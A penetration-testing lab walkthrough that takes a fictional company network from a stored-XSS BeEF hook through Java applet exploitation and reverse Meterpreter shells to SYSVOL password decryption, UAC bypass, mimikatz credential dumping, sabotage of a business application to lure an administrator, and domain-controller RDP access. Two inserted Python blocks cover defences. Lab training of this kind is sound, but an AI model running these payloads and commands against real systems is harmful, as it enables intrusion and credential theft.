© 2018 Caendra, Inc. - Hera For PTP - From XSS To Domain Admin


FooResearch asked you to perform a pentest against its infrastructure. The company has a
website which hosts a blog. The comment section of the blog is vulnerable to stored XSS
attacks. FooResearch’s employees browse the blog throughout their work day.

You can reach the site and the blog at:

• blog.fooresearch.site (172.16.111.1)

Note: Add the following to your /etc/hosts file in order to resolve the host:

172.16.111.1 blog.fooresearch.site

To contact the web application, you can either use its DNS name or its IP address. It doesn't
matter for this lab which option you choose.

Here is the lab environment:

• Get a shell to an internal machine by exploiting the XSS in the blog
• Get some local administrator credentials
• Get Active Directory administrator credentials
• Get access to a domain controller as a domain administrator
• As a proof of concept for your report, take a screenshot of an admin RDP session on the domain controller

• Basic XSS exploitation
• BeEF-XSS usage to perform information gathering
• Using Metasploit to get a shell on a system
• Default, weak Active Directory policy ACLs
• Bypassing UAC
• How to obtain credentials using Mimikatz

To guide you during the lab you will find different Tasks.

Tasks are meant for educational purposes and to show you the usage of different tools and
different methods to achieve the same goal.

They are not meant to be used as a methodology.

Armed with the skills acquired through the Tasks, you can achieve the lab goal.

If this is the first time you are doing this lab, we advise you to follow these Tasks.

Once you have completed all the Tasks, you can proceed to the end of this paper and check
the solutions.

• Browser
• BeEF-XSS
• Metasploit

Hook an internal browser with BeEF-XSS. Your XSS has to be stealthy: if a user notices
something strange, for example an alert(), they will stop browsing the blog.

Get information about the browser and its plugins, and try to find a vulnerable plugin to exploit.

Using the information gathered, get a shell on an internal machine.

Get information about the AD infrastructure, especially:

• The domain name
• Information about domain controllers

By exploiting the default file permissions on group policy files, get the username and
password of a local administrator account.

Identify other hosts on the network and get information about their operating systems.

Choose your next target and use the credentials you got at the previous task to get a shell.

Find a way to cause a Domain Administrator to connect to the target machine.

Find a way to steal an authorization token or credentials of a domain administrator.

Open an RDP connection to a domain controller as a domain admin as a PoC of your
exploitation.

Start BeEF-XSS and inject its hooking script in the comment section of the blog. Something
like:

<script src="http://address:3000/hook.js"></script>

Remember to use your VPN address in the payload. Once a victim visits the blog you will
find a new entry in the BeEF console. Your browser will be hooked too :-)
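As an added illustration (not the FooResearch blog's code and not part of the original lab), these are the two server-side controls that would neutralise the hook injected above: output encoding of the comment, and a Content-Security-Policy that refuses scripts from any origin but the blog's own. The blog page URL, the CSP value and the function names are assumptions, and the CSP source matcher is a deliberately simplified model of the real algorithm.

```python
import html
from urllib.parse import urlsplit

# Constructed sample: the BeEF hook payload from the walkthrough, posted as a comment.
# The address is the lab's attacker host; any remote host behaves the same way.
HOOK_COMMENT = '<script src="http://172.16.111.30:3000/hook.js"></script>'

# Hypothetical hardening for the blog: a CSP that only allows same-origin scripts.
BLOG_PAGE = "http://blog.fooresearch.site/post/1"
BLOG_CSP = "default-src 'self'; script-src 'self'; object-src 'none'"


def render_comment(text: str) -> str:
    """Output-encode a comment for an HTML body context.
    html.escape turns < > & " ' into entities, so the hook payload is shown
    as literal text instead of being parsed as a <script> element."""
    return '<p class="comment">%s</p>' % html.escape(text, quote=True)


def _origin(url: str) -> tuple:
    """(scheme, host, port) of a URL, filling in the scheme's default port."""
    p = urlsplit(url)
    port = p.port or (443 if p.scheme == "https" else 80)
    return (p.scheme.lower(), (p.hostname or "").lower(), port)


def _parse_csp(policy: str) -> dict:
    """Split a CSP header into {directive: [source, ...]} (simplified)."""
    directives = {}
    for part in policy.split(";"):
        tokens = part.split()
        if tokens:
            directives[tokens[0].lower()] = tokens[1:]
    return directives


def script_allowed(script_url: str, policy: str, page_url: str) -> bool:
    """Would a <script src=script_url> load on page_url under this policy?
    Models 'self', 'none', exact host sources and *.wildcard hosts, which is
    enough to show why a remote hook.js is refused; nonces, hashes and
    scheme-only sources are out of scope (simplified matcher)."""
    directives = _parse_csp(policy)
    sources = directives.get("script-src", directives.get("default-src", []))
    if "'none'" in sources:
        return False
    target = _origin(script_url)
    for src in sources:
        if src == "'self'":
            if target == _origin(page_url):
                return True
            continue
        if src.startswith("'"):
            continue  # keyword source we do not model
        scheme, _, hostport = src.rpartition("://")
        host, _, port = hostport.partition(":")
        if scheme and scheme.lower() != target[0]:
            continue
        default_port = 443 if (scheme or target[0]).lower() == "https" else 80
        if port == "" and target[2] != default_port:
            continue
        if port not in ("", "*") and int(port) != target[2]:
            continue
        host = host.lower()
        if host.startswith("*."):
            if target[1].endswith(host[1:]):
                return True
        elif host == target[1]:
            return True
    return False
```

Either control alone stops this particular payload; together they also cover the case where a new comment field is added without encoding.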

Use BeEF’s Details tab and the Host > Get System Info command within the
“Commands” tab to get information about the browser, the OS and the plugins installed.

As you can see from the second screenshot, Java 1.0.0_17 is installed. Let us move on to
Metasploit to see whether we can exploit the plugin.

Metasploit has some modules to exploit jre17 vulnerabilities. You can use
java_jre17_provider_skeleton as it is very stable.

msf > use exploit/multi/browser/java_jre17_provider_skeleton
msf exploit(multi/browser/java_jre17_provider_skeleton) >

It has several targets available, you can see them by typing the “show targets” command.

msf exploit(multi/browser/java_jre17_provider_skeleton) > show targets

Exploit targets:

Id Name
-- ----
0 Generic (Java Payload)
1 Windows x86 (Native Payload)
2 Mac OS X x86 (Native Payload)
3 Linux x86 (Native Payload)

msf exploit(multi/browser/java_jre17_provider_skeleton) >

As you know (from Task 2) the OS is Windows 7 32-bit, so you can set it as the target:

msf exploit(multi/browser/java_jre17_provider_skeleton) > set TARGET 1

Then you can select a Windows-specific payload by typing:

> set payload windows/meterpreter/reverse_tcp

Then, you can configure the following options:

• Set SRVHOST as your VPN IP address
• Set LHOST as your VPN IP address
• Set SRVPORT and LPORT as you prefer, making sure the two ports are different.

And finally, the exploit command will generate a URL hosting a malicious Java applet.

msf exploit(multi/browser/java_jre17_provider_skeleton) > set SRVHOST 172.16.111.30
SRVHOST => 172.16.111.30
msf exploit(multi/browser/java_jre17_provider_skeleton) > set LHOST 172.16.111.30
LHOST => 172.16.111.30
msf exploit(multi/browser/java_jre17_provider_skeleton) > set SRVPORT 8888
SRVPORT => 8888
msf exploit(multi/browser/java_jre17_provider_skeleton) > set LPORT 8889
LPORT => 8889
msf exploit(multi/browser/java_jre17_provider_skeleton) > exploit -j
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 172.16.111.30:8889
msf exploit(multi/browser/java_jre17_provider_skeleton) > [*] Using URL: http://172.16.111.30:8888/QjXAmeJ
[*] Server started.

Now, you can send this payload to a vulnerable machine in two ways:

• You can re-use the XSS in the blog
• You can inject an invisible iframe in the hooked browser

Choosing the second option gives you better control over your exploitation session: this
way you exploit just the machine you hooked via BeEF.

If you choose the first option, your payload would also be delivered to other machines.

On BeEF you can use the Misc > Create Invisible Iframe command:

After some seconds the browser will receive and execute the payload, thus giving you a
Meterpreter shell on the victim machine.

By using the sessions -i 1 command in msfconsole, you get access to the interactive
Meterpreter shell.

You can get some information about the system and your privileges by using some
standard Meterpreter commands, like:

• sysinfo
• getuid
• ifconfig

And so on…

As you can see, you have standard user privileges, so you cannot escalate to SYSTEM
privileges: the “getsystem” command fails, as shown in the screenshot below.

Remember to keep track of the IP address and the most relevant information about the
machine. You will need the network address (192.168.200.0/24) later.

You can carry on with the Active Directory exploitation by using a standard cmd shell.
Metasploit gives you some modules to do that, but they do not work in every case or configuration.

You can drop a cmd shell by issuing the shell command to meterpreter.

Then you can use the set command to get information about the environment variables in
your victim’s environment.

The most interesting values are:

• LOGONSERVER, gives you information about the domain controller used for
authentication
• USERDNSDOMAIN, gives you information about the FQDN of the AD domain
• USERDOMAIN, contains the name of the AD domain in NT format
• USERNAME, contains the current username in NT format

You can also use some Meterpreter commands to get information from the AD
infrastructure by loading the extapi extension.

> load extapi

And then enumerate computers and users:

Active Directory policies are stored in a special UNC path:

%USERDNSDOMAIN%\Policies

But cmd cannot use a UNC path as its current directory, so you have to use the Sysvol
share you can find on a domain controller:

%LOGONSERVER%\Sysvol

First, drop into a shell again via meterpreter:

meterpreter > shell
Process 3472 created.
Channel 2 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Users\SecondUser\Desktop>

Next, we can use the “net use” command to mount the SysVol share on the Domain
Controller as a drive called “X”:

C:\Users\SecondUser\Desktop>net use X: \\DC01\SysVol
net use X: \\DC01\SysVol
The command completed successfully.

C:\Users\SecondUser\Desktop>X:
X:

X:\>cd examplead.lan\Policies
cd examplead.lan\Policies

X:\examplead.lan\Policies>dir
dir
Volume in drive X has no label.
Volume Serial Number is 6C66-920E

Directory of X:\examplead.lan\Policies

07/31/2014 05:10 AM <DIR> .
07/31/2014 05:10 AM <DIR> ..
06/24/2014 03:20 AM <DIR> {31B2F340-016D-11D2-945F-00C04FB984F9}
07/31/2014 05:11 AM <DIR> {69BCC2AD-B7E5-4E02-833D-DBFDD19E7EB4}
06/24/2014 03:20 AM <DIR> {6AC1786C-016F-11D2-945F-00C04fB984F9}
06/24/2014 06:43 AM <DIR> {7635CC99-2423-4809-A2E6-20A9BB8294BB}
07/17/2014 05:40 AM <DIR> {9E4B6CF5-DE26-4631-A4A6-D0C845998366}

Then you can find user-creation policies by searching for Groups.xml files in the policies
directory.

X:\examplead.lan\Policies>dir /s *.xml
dir /s *.xml
Volume in drive X has no label.
Volume Serial Number is 6C66-920E

Directory of X:\examplead.lan\Policies\{69BCC2AD-B7E5-4E02-833D-DBFDD19E7EB4}\Machine\Preferences\Groups

07/31/2014 05:11 AM 830 Groups.xml
1 File(s) 830 bytes

Directory of X:\examplead.lan\Policies\{9E4B6CF5-DE26-4631-A4A6-D0C845998366}\Machine\Preferences\Groups

07/17/2014 05:40 AM 352 Groups.xml
1 File(s) 352 bytes

Total Files Listed:
2 File(s) 1,182 bytes
0 Dir(s) 712,482,816 bytes free

X:\examplead.lan\Policies>

Those files contain information about local users and groups deployed via group policies.

System administrators usually use AD policies to deploy a local administrator account in a
domain environment.

Those files also contain information about usernames, encrypted passwords and the
groups.

X:\examplead.lan\Policies>type X:\examplead.lan\Policies\{69BCC2AD-B7E5-4E02-
833D-DBFDD19E7EB4}\Machine\Preferences\Groups\Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User
clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="LADM" image="0"
changed="2014-07-31 12:11:27" uid="{02526B4C-A2A5-48D9-A357-
80B0D8E9825D}"><Properties action="C" fullName="" description=""
cpassword="0cU/uGQrF5Xfhm61HAK8wFlfYce2W6ODQAeI957VrqY" changeLogon="0"
noChange="0" neverExpires="1" acctDisabled="0" userName="LADM"/></User>
<Group clsid="{6D4A79E4-529C-4481-ABD0-F5BD7EA93BA7}"
name="Administrators" image="2" changed="2014-07-31 12:11:54" uid="{AEAF1E3C-
2DC1-4206-A907-6064727BB08A}"><Properties action="U" newName=""
description="" deleteAllUsers="0" deleteAllGroups="0" removeAccounts="0"
groupName="Administrators"><Members><Member name="LADM" action="ADD"
sid=""/></Members></Properties></Group>
</Groups>

X:\examplead.lan\Policies>

The previous output contains the following information:

• LADM is the user;
• 0cU/uGQrF5Xfhm61HAK8wFlfYce2W6ODQAeI957VrqY is the encrypted password;
• The policy adds that user to the Administrators group.

To decrypt the password, you can use the gpp-decrypt tool in Kali.

$ gpp-decrypt 0cU/uGQrF5Xfhm61HAK8wFlfYce2W6ODQAeI957VrqY
Pm2fUXScqI

Pm2fUXScqI is the clear text password of LADM.
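Added example, not from the original lab: a SYSVOL audit in Python that parses the Groups.xml format shown above (and the other Group Policy Preference files that use the same cpassword attribute) and reports every preference item that still embeds a password, so the item can be removed and the account rotated. The sample XML is the file from the walkthrough with its terminal line wraps joined; the directory layout under Policies and the temporary tree built by demo() are assumptions, as are the function names.

```python
import os
import tempfile
import xml.etree.ElementTree as ET

# Group Policy Preference files that can carry a cpassword attribute (lower-cased).
GPP_FILES = ("groups.xml", "services.xml", "scheduledtasks.xml",
             "datasources.xml", "drives.xml", "printers.xml")

# Constructed copy of the Groups.xml shown in the walkthrough.
SAMPLE_GROUPS_XML = b"""<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User
clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="LADM" image="0"
changed="2014-07-31 12:11:27" uid="{02526B4C-A2A5-48D9-A357-80B0D8E9825D}"><Properties
action="C" fullName="" description="" cpassword="0cU/uGQrF5Xfhm61HAK8wFlfYce2W6ODQAeI957VrqY"
changeLogon="0" noChange="0" neverExpires="1" acctDisabled="0" userName="LADM"/></User>
<Group clsid="{6D4A79E4-529C-4481-ABD0-F5BD7EA93BA7}" name="Administrators" image="2"
changed="2014-07-31 12:11:54" uid="{AEAF1E3C-2DC1-4206-A907-6064727BB08A}"><Properties
action="U" newName="" description="" deleteAllUsers="0" deleteAllGroups="0"
removeAccounts="0" groupName="Administrators"><Members><Member name="LADM" action="ADD"
sid=""/></Members></Properties></Group>
</Groups>"""


def findings_from_xml(data: bytes, source: str = "<inline>") -> list:
    """One finding per preference item that embeds a cpassword.
    The cpassword AES key is published by Microsoft, so the value is as good as
    clear text (gpp-decrypt recovers it); it is reported here, not decrypted."""
    root = ET.fromstring(data)
    # Group membership changes in the same file show what the account is for.
    added_to = {}
    for group in root.findall("Group"):
        for member in group.iter("Member"):
            if member.get("action", "").upper() == "ADD":
                added_to.setdefault(member.get("name"), []).append(group.get("name"))
    findings = []
    for item in root:
        props = item.find("Properties")
        if props is None or not props.get("cpassword"):
            continue
        # Different GPP item types name the account differently.
        account = (props.get("userName") or props.get("accountName")
                   or props.get("runAs") or item.get("name"))
        findings.append({
            "source": source, "element": item.tag, "account": account,
            "action": props.get("action"), "changed": item.get("changed"),
            "cpassword": props.get("cpassword"),
            "added_to": added_to.get(account, []),
        })
    return findings


def audit_policies(policies_dir: str) -> list:
    """Walk a Policies directory (e.g. the mapped X:\\examplead.lan\\Policies)
    and collect findings from every GPP file, whatever its case on disk."""
    findings = []
    for dirpath, _, files in os.walk(policies_dir):
        for name in files:
            if name.lower() in GPP_FILES:
                path = os.path.join(dirpath, name)
                with open(path, "rb") as fh:
                    findings.extend(findings_from_xml(fh.read(), path))
    return findings


def demo() -> list:
    """Build a throw-away Policies tree holding the sample file and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        gpo = os.path.join(tmp, "{69BCC2AD-B7E5-4E02-833D-DBFDD19E7EB4}",
                           "Machine", "Preferences", "Groups")
        os.makedirs(gpo)
        with open(os.path.join(gpo, "Groups.xml"), "wb") as fh:
            fh.write(SAMPLE_GROUPS_XML)
        return audit_policies(tmp)
```

Microsoft's MS14-025 update (KB2962486) stops new passwords from being written into these files but leaves existing ones in place, which is why the remediation is to delete the item and rotate the account, not just to patch.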

You can find other Windows machines by running a post module within the Meterpreter
session.

To get information about any kind of machine, you should also use other methods like a
ping sweep or a port scan on the 192.168.200.0/24 network.

To do that you need to route the traffic from other Metasploit modules through your
existing Meterpreter session:

meterpreter> background
msf> route add 192.168.200.0 255.255.255.0 1
[*] Route added

To detect the SMB version, and thus the OS version, of the Windows machines you can use the
“smb_version” scanner module:

msf> use auxiliary/scanner/smb/smb_version
msf auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.200.100,200,210
msf auxiliary(scanner/smb/smb_version) > exploit
[+] 192.168.200.100:445 - Host is running Windows 2008 Datacenter SP1 (build:6001) (name:DC01) (domain:EXAMPLEAD)
[*] Scanned 1 of 3 hosts (33% complete)
[*] 192.168.200.200:445 - Host could not be identified: ()
[*] Scanned 2 of 3 hosts (66% complete)
[+] 192.168.200.210:445 - Host is running Windows 7 Professional SP1 (build:7601) (name:PCCLIENT7) (domain:EXAMPLEAD)
[*] Scanned 3 of 3 hosts (100% complete)
[*] Auxiliary module execution completed

The module discovers a Windows 2008 host, an unidentified host, and the Windows 7 machine
you already got the shell on.

We’ll continue on our path from our existing Windows 7 shell for now, as it will be a good
learning lesson along the way :)

Windows 7 does not accept a psexec command from a non-domain admin by default, so
you need a way to get around that.

To get an administrator shell you have to create an executable with msfvenom or
msfconsole, upload it to the compromised machine and then execute it with the LADM
credentials.

msf> use payload/windows/meterpreter/reverse_tcp

Configure it to connect back to your machine and generate an executable file:

msf payload(windows/meterpreter/reverse_tcp) > set LHOST 172.16.111.30
LHOST => 172.16.111.30
msf payload(windows/meterpreter/reverse_tcp) > set LPORT 11112
LPORT => 11112
msf payload(windows/meterpreter/reverse_tcp) > generate -f msfadexploit.exe -t exe
[*] Writing 73802 bytes to msfadexploit.exe...
msf payload(windows/meterpreter/reverse_tcp) >

To receive the connection, you can use the multi/handler module.

It is up to you to choose if you want to run the handler from a second msfconsole, or you
want to run it in the background by using the -j switch for the exploit command.

msf payload(windows/meterpreter/reverse_tcp) > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LPORT 11112
LPORT => 11112
msf exploit(multi/handler) > set LHOST 172.16.111.30
LHOST => 172.16.111.30
msf exploit(multi/handler) > exploit -j
[*] Exploit running as background job 1.

[*] Started reverse TCP handler on 172.16.111.30:11112
msf exploit(multi/handler) >

In a domain environment, a default Windows 7 machine:

• does not accept a psexec command from a non-domain administrator
• has UAC enabled
• prevents a local administrator from accessing a user’s profile without a UAC prompt

To get around the first two limitations you can upload the generated exploit exe to the
target machine and then use the “windows/manage/run_as” module to execute the
payload as the LADM user, whose credentials we obtained via the SysVol information
disclosure.

First, we should upload our payload to the target:

msf exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > cd ../
meterpreter > upload msfadexploit.exe
[*] uploading : msfadexploit.exe -> msfadexploit.exe
[*] Uploaded 72.07 KiB of 72.07 KiB (100.0%): msfadexploit.exe -> msfadexploit.exe
[*] uploaded : msfadexploit.exe -> msfadexploit.exe

Next, we’ll use the icacls cmd command to grant full control to “Everyone” for the
payload we uploaded to the SecondUser user directory:

meterpreter > shell
Process 896 created.
Channel 3 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Users\SecondUser>icacls msfadexploit.exe /grant Everyone:(F)
icacls msfadexploit.exe /grant Everyone:(F)
processed file: msfadexploit.exe
Successfully processed 1 files; Failed processing 0 files

C:\Users\SecondUser>

Finally, we can configure the windows/manage/run_as module to execute our payload as
the LADM user:

msf exploit(multi/handler) > use post/windows/manage/run_as
msf post(windows/manage/run_as) > set CMD C:\\Users\\SecondUser\\msfadexploit.exe
CMD => C:\Users\SecondUser\msfadexploit.exe
msf post(windows/manage/run_as) > set USER LADM
USER => LADM
msf post(windows/manage/run_as) > set PASSWORD Pm2fUXScqI
PASSWORD => Pm2fUXScqI
msf post(windows/manage/run_as) > set SESSION 1
SESSION => 1
msf post(windows/manage/run_as) > set DOMAIN PCCLIENT7
DOMAIN => PCCLIENT7
msf post(windows/manage/run_as) > exploit

This should result in getting another meterpreter session, this time however, as the LADM
user.

[*] Executing CreateProcessWithLogonW...
[+] Process started successfully, PID: 3792
[*] Command Run: cmd.exe /c C:\Users\SecondUser\msfadexploit.exe
[*] Post module execution completed
msf post(windows/manage/run_as) >
[*] Sending stage (179779 bytes) to 172.16.111.1
[*] Meterpreter session 2 opened (172.16.111.30:11112 -> 172.16.111.1:65223) at 2018-05-03 18:03:28 -0400

msf post(windows/manage/run_as) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: PCCLIENT7\LADM
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter >

The new Meterpreter session runs under local administrator account privileges. We can
also see above, that the “getsystem” command fails with an “Access Denied” error. If you
want to escalate to SYSTEM, you must bypass UAC.

We background the meterpreter session, and load the bypassuac_injection module to
accomplish this.

Note: Make sure you configure the module for the session running under the LADM user.
This should be the newest session.

msf post(windows/manage/run_as) > use exploit/windows/local/bypassuac_injection
msf exploit(windows/local/bypassuac_injection) > set SESSION 2
msf exploit(windows/local/bypassuac_injection) > set payload windows/meterpreter/reverse_tcp
msf exploit(windows/local/bypassuac_injection) > set LHOST 172.16.111.30
LHOST => 172.16.111.30
msf exploit(windows/local/bypassuac_injection) > set LPORT 11113
LPORT => 11113
msf exploit(windows/local/bypassuac_injection) > exploit

[*] Started reverse TCP handler on 172.16.111.30:11113
[+] Windows 7 (Build 7601, Service Pack 1). may be vulnerable.
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Uploading the Payload DLL to the filesystem...
[*] Spawning process with Windows Publisher Certificate, to inject into...
[+] Successfully injected payload in to process: 2992
[*] Sending stage (179779 bytes) to 172.16.111.1
[*] Meterpreter session 3 opened (172.16.111.30:11113 -> 172.16.111.1:47484) at 2018-05-03 18:06:22 -0400

meterpreter >

If the module fails the first time, you may need to run it a couple of times before it
successfully bypasses UAC.

You know that LegacyApp and ModernApp are used by users. You can see ModernApp.exe
running on the Windows 7 machine by issuing the ps command in meterpreter.

If you try to kill the application, the user will re-open it, but if you kill it and then delete the
executable file, the user will not be able to run it again. If a user cannot run a business
application, they will call the IT Support.

Then someone from the IT staff will connect to the machine to fix the problem. The idea
here is that a network administrator will connect to the machine to restart the application,
which should leave credentials in memory.

After waiting some time for the admin to connect, you can re-check the running processes
and confirm that the Domain Administrator has authenticated to the machine running
several processes.

We can now dump the Domain Administrator’s credentials using mimikatz.

In order to load mimikatz, we should first run the “getsystem” command from our
meterpreter session.

Next, now that we’re SYSTEM on the target, let’s see if we can use mimikatz to dump the
“exampleadm” user’s password from memory.

First, we’ll load the mimikatz extension from our current meterpreter session:

meterpreter > load mimikatz
Loading extension mimikatz...Success.

Next, we run the “Kerberos” command, but quickly realize there are no passwords to be
obtained here.

meterpreter > kerberos
[+] Running as SYSTEM
[*] Retrieving kerberos credentials
kerberos credentials
====================

AuthID Package Domain User Password
------ ------- ------ ---- --------
0;2339883 NTLM PCCLIENT7 LADM
0;2339854 NTLM PCCLIENT7 LADM
0;1037535 Negotiate EXAMPLEAD ExampleAdm
0;1037506 Kerberos EXAMPLEAD ExampleAdm
0;923457 NTLM PCCLIENT7 LADM
0;923428 NTLM PCCLIENT7 LADM
0;66524 Kerberos EXAMPLEAD SecondUser

We can see our “ExampleAdm” user in the output above, however, no password. We try the
“wdigest” option, which ultimately is a success.

meterpreter > wdigest
[+] Running as SYSTEM
[*] Retrieving wdigest credentials
wdigest credentials
===================

AuthID Package Domain User Password
------ ------- ------ ---- --------
0;997 Negotiate NT AUTHORITY LOCAL SERVICE
0;38832 NTLM
0;2339883 NTLM PCCLIENT7 LADM Pm2fUXScqI
0;2339854 NTLM PCCLIENT7 LADM Pm2fUXScqI
0;923457 NTLM PCCLIENT7 LADM Pm2fUXScqI
0;923428 NTLM PCCLIENT7 LADM Pm2fUXScqI
0;66524 Kerberos EXAMPLEAD SecondUser consciousAlert...
0;1037535 Negotiate EXAMPLEAD ExampleAdm manageth3PC'z
0;1037506 Kerberos EXAMPLEAD ExampleAdm manageth3PC'z

We can see we have obtained the Domain Admin credentials!

Using this information, we can proceed to trying to connect to the domain controller using
the newly acquired credentials.

To connect via remote desktop, we have to first forward our RDP traffic through an existing
Meterpreter session.

We’ll forward the port 3389 (RDP) of the DC01 machine (192.168.200.100) to your local
machine.

meterpreter > portfwd add -L 127.0.0.1 -l 3389 -r 192.168.200.100 -p 3389
[*] Local TCP relay created: 127.0.0.1:3389 <-> 192.168.200.100:3389
meterpreter >

Then you can connect via RDP to your localhost address:

$ rdesktop -u examplead\\exampleadm -p "manageth3PC'z" 127.0.0.1
